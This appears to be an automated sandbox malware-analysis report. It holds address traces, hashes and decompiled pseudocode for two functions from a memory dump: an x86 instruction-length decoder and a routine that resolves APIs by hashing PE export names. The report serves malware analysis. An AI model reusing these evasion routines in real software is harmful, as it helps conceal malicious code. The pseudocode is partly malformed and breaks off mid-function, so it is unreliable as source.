0x6ec6867f
0x6ec68690
0x6ec686ae
0x6ec686b0
0x6ec686b4
0x6ec686b4
0x6ec686b4
0x6ec68635
0x00000000
0x6ec68613
0x6ec685cb
0x6ec685cb
0x6ec685d0
0x6ec685d7
0x6ec685e6
0x6ec685ed
0x6ec685ef
0x00000000
0x00000000
0x6ec685fb
0x6ec685fc
0x6ec685fe
0x00000000
0x00000000
0x00000000
0x6ec685fe
0x6ec685f1
0x6ec685f4
0x00000000
0x00000000
0x6ec686b6
0x6ec686b6
0x6ec686b7
0x6ec686b7
0x00000000
0x6ec68497
0x6ec68497
0x6ec68497
0x6ec68499
0x6ec684a0
0x6ec684ae
0x6ec684b0
0x6ec684b4
0x6ec684b6
0x6ec684e2
0x6ec684e6
0x6ec684eb
0x6ec684f0
0x6ec684f4
0x6ec684f8
0x6ec684ff
0x6ec68504
0x6ec68506
0x6ec68a95
0x6ec68aa4
0x6ec68ac3
0x6ec68ac8
0x6ec68ac8
0x6ec68519
0x6ec6851e
0x6ec68522
0x6ec68522
0x6ec68522
0x6ec68533
0x6ec68535
0x6ec68537
0x6ec68548
0x6ec68548
0x6ec6854d
0x6ec68552
0x6ec68556
0x6ec6855b
0x6ec68562
0x6ec68567
0x6ec68569
0x6ec68a57
0x6ec68a63
0x6ec68a7d
0x6ec68a82
0x6ec68a82
0x6ec6857f
0x6ec68584
0x6ec68588
0x6ec68588
0x6ec68588
0x6ec68588
0x6ec6858b
0x6ec6858b
0x00000000
0x6ec6858b
0x6ec684ba
0x6ec684ba
0x6ec684bc
0x6ec684c8
0x6ec684cf
0x6ec684d1
0x00000000
0x00000000
0x6ec684dd
0x6ec684de
0x6ec684e0
0x00000000
0x00000000
0x00000000
0x6ec684e0
0x6ec684d3
0x6ec684d6
0x00000000
0x00000000
0x6ec6858c
0x6ec68590
0x6ec68591
0x6ec68591
0x00000000
0x6ec68499
0x6ec68491

Strings

, xrefs: 6EC68A1A

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction ID: 1c362ea14ea409617590a98be7354a807397f5b6e4e8e33219e27900c2e468d6
Opcode Fuzzy Hash: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction Fuzzy Hash: 5F123C722083459FC724DFA4C8D0AAFB7E9AF85708F104D2DE999972A1FB309C05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EC79370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EC79370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6EC73698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6ec79377
0x6ec7937b
0x6ec79387
0x6ec7938b
0x6ec7938f
0x6ec79394
0x6ec79397
0x6ec79399
0x6ec7939b
0x6ec7939b
0x6ec7939e
0x6ec793a4
0x6ec7941c
0x6ec79420
0x6ec79423
0x6ec79423
0x6ec79426
0x00000000
0x6ec79426
0x6ec793ab
0x6ec79413
0x6ec79417
0x00000000
0x6ec79417
0x6ec793b2
0x6ec7940b
0x6ec7940e
0x00000000
0x6ec7940e
0x6ec793b7
0x6ec793f5
0x6ec793fc
0x6ec793ff
0x6ec793c8
0x6ec793c8
0x6ec793ce
0x00000000
0x00000000
0x6ec793d3
0x6ec793ed
0x6ec793f0
0x00000000
0x6ec793f0
0x6ec793d8
0x00000000
0x6ec793da
0x6ec793de
0x6ec793e1
0x00000000
0x6ec793e1
0x6ec793d8
0x6ec79429
0x6ec79429
0x6ec79429
0x6ec79432
0x6ec7943b
0x6ec7943e
0x6ec79441
0x6ec79444
0x6ec79447
0x6ec7944d
0x6ec7948f
0x6ec79492
0x6ec79493
0x6ec7949a
0x6ec7949d
0x6ec7944f
0x6ec79453
0x6ec7945d
0x6ec79464
0x6ec79466
0x6ec7947f
0x6ec79482
0x6ec79482
0x6ec79464
0x6ec794a5
0x6ec794a8
0x6ec794ab
0x6ec794af
0x6ec794b3
0x6ec794bd
0x6ec794c1
0x6ec794cb
0x6ec794d4
0x6ec794e1
0x6ec794e4
0x6ec794e7
0x6ec794e7
0x6ec794f3
0x6ec794fe
0x6ec79504
0x6ec79508
0x6ec794f5
0x6ec794f5
0x6ec794f5
0x6ec79510
0x6ec7953a
0x6ec79540
0x6ec79540
0x6ec79548
0x6ec798f1
0x6ec798f7
0x6ec798fd
0x6ec798fd
0x00000000
0x6ec7954e
0x6ec7954e
0x6ec79552
0x6ec79555
0x6ec79558
0x6ec7955b
0x6ec7955f
0x6ec79561
0x6ec79564
0x6ec79567
0x6ec7956b
0x6ec79570
0x6ec79573
0x6ec79577
0x6ec7957c
0x6ec7957f
0x6ec79581
0x6ec79584
0x6ec79588
0x6ec7958d
0x6ec7959d
0x6ec795a3
0x6ec795a3
0x6ec795ab
0x6ec795ad
0x6ec795b6
0x6ec795b8
0x6ec795bb
0x6ec795c6
0x6ec795f3
0x6ec795c8
0x6ec795df
0x6ec795df
0x6ec795fb
0x6ec79601
0x6ec79607
0x6ec79607
0x6ec795fb
0x6ec795b6
0x6ec7960e
0x6ec7967f
0x6ec79684
0x6ec796dd
0x6ec7979f
0x6ec797a4
0x6ec797b3
0x6ec797b9
0x6ec797bd
0x6ec797c6
0x6ec797cd
0x6ec797d6
0x6ec797e4
0x6ec797e7
0x6ec797cf
0x6ec797cf
0x6ec797cf
0x6ec797cd
0x6ec797f0
0x6ec7981d
0x6ec79830
0x6ec79838
0x6ec7981f
0x6ec79821
0x6ec79829
0x6ec79829
0x6ec797f2
0x6ec797f7
0x6ec79816
0x6ec797f9
0x6ec797fe
0x6ec7980f
0x6ec79800
0x6ec79800
0x6ec79800
0x6ec797fe
0x6ec797f7
0x6ec79840
0x6ec7984f
0x6ec7985c
0x6ec79865
0x6ec79869
0x6ec7986d
0x6ec79870
0x6ec79873
0x6ec79876
0x6ec79879
0x6ec7987c
0x6ec79882
0x6ec79886
0x6ec7988c
0x6ec7988c
0x6ec79882
0x6ec79892
0x6ec798cf
0x6ec798d3
0x6ec798da
0x6ec798e0
0x6ec79894
0x6ec79897
0x6ec798b7
0x6ec798bb
0x6ec798c2
0x6ec798c9
0x6ec79899
0x6ec7989c
0x6ec7989e
0x6ec798a2
0x6ec798ac
0x6ec798b2
0x6ec798b2
0x6ec7989c
0x6ec79897
0x6ec798e7
0x6ec798e7
0x6ec79900
0x6ec79900
0x6ec79906
0x6ec7990b
0x6ec79965
0x6ec7996a
0x6ec799a9
0x6ec799ae
0x6ec799b0
0x6ec799b4
0x6ec799b7
0x6ec799ba
0x6ec799bc
0x6ec799bd
0x6ec799bd
0x6ec799c2
0x6ec799e0
0x6ec799e2
0x6ec799e6
0x6ec799ec
0x6ec799ef
0x6ec799f1
0x6ec799f2
0x6ec799f2
0x00000000
0x6ec799c4
0x6ec799c4
0x6ec799c4
0x6ec799c8
0x6ec799ce
0x6ec799d1
0x6ec799d3
0x6ec799d6
0x6ec799f5
0x6ec799f5
0x6ec799fc
0x6ec79a16
0x6ec799fe
0x6ec799fe
0x6ec79a0a
0x6ec79a0b
0x6ec79a0e
0x6ec79a0e
0x6ec79a24
0x6ec79a24
0x6ec799c2
0x6ec7996f
0x6ec7997d
0x6ec79995
0x6ec79999
0x6ec7999c
0x6ec799a2
0x6ec799a6
0x6ec799a6
0x00000000
0x6ec799a6
0x6ec7997f
0x6ec79983
0x6ec79989
0x6ec79989
0x6ec7998f
0x00000000
0x6ec7998f
0x6ec79971
0x6ec79975
0x00000000
0x6ec79975
0x6ec7990f
0x6ec7993b
0x6ec79953
0x6ec79957
0x6ec7995a
0x6ec7995d
0x6ec7995f
0x6ec79962
0x6ec7993d
0x6ec7993d
0x6ec79941
0x6ec79944
0x6ec79947
0x6ec7994a
0x6ec7994d
0x6ec7994d
0x00000000
0x6ec7993b
0x6ec79915
0x00000000
0x00000000
0x6ec7991b
0x6ec7991f
0x6ec79925
0x6ec79928
0x6ec7992b
0x6ec7992e
0x00000000
0x6ec7992e
0x6ec797a6
0x6ec797aa
0x6ec797b0
0x00000000
0x6ec797b0
0x6ec796e8
0x6ec796fa
0x6ec796ff
0x6ec7976a
0x00000000
0x00000000
0x6ec79771
0x6ec79797
0x6ec7979b
0x00000000
0x00000000
0x6ec7977a
0x6ec7977f
0x6ec79793
0x00000000
0x00000000
0x00000000
0x6ec79795
0x6ec79786
0x00000000
0x00000000
0x6ec7978b
0x00000000
0x00000000
0x6ec7978d
0x00000000
0x6ec79771
0x6ec79701
0x6ec7970b
0x6ec7971c
0x6ec7971f
0x6ec79722
0x6ec79728
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec7972e
0x6ec7972e
0x6ec7972e
0x6ec79735
0x00000000
0x00000000
0x6ec79737
0x6ec7973a
0x6ec79740
0x00000000
0x00000000
0x00000000
0x6ec79742
0x6ec79744
0x6ec7974d
0x00000000
0x00000000
0x6ec79761
0x00000000
0x00000000
0x00000000
0x6ec79763
0x6ec796ef
0x00000000
0x00000000
0x00000000
0x6ec796f5
0x6ec79689
0x6ec796b8
0x6ec796b9
0x6ec796c2
0x00000000
0x6ec796d3
0x00000000
0x6ec796d3
0x6ec79690
0x6ec79693
0x6ec796a6
0x6ec796a7
0x6ec796ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec79693
0x6ec79689
0x6ec79615
0x6ec79672
0x6ec79676
0x6ec7967c
0x00000000
0x6ec7967c
0x6ec79617
0x6ec7961b
0x6ec79628
0x6ec7962c
0x6ec79642
0x6ec7964a
0x6ec7962e
0x6ec79630
0x6ec7963a
0x6ec7963a
0x6ec79650
0x6ec79659
0x6ec79670
0x00000000
0x00000000
0x00000000
0x6ec79670
0x6ec7965b
0x6ec7965b
0x00000000
0x6ec79650

Strings

, xrefs: 6EC799DB

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: dc8a7aa3869fe094a97db5cbd2acec33623ef02fa8b2b1e9d5775f1cdfc6fddd
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: BD22A23140C3968FDB64CF56C4A136ABBF1FF86300F05896DE8E54B295E3359985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EC7143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6EC7143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6EC70304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ec7d208 == 0 ||  *0x6ec7d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6EC74FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ec7d2f0 |  *0x6ec7d2f1;
									if(( *0x6ec7d2f0 |  *0x6ec7d2f1) == 0) {
										_t525 =  *0x6ec7d208; // 0xfa1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ec7d2f0 = 1;
											_t526 = E6EC7361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6EC71C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ec7d208 = _t526;
											 *0x6ec7d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6EC7361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6EC71C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6EC6DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6EC6DFC0(_t527,  &(_t535[0x58]));
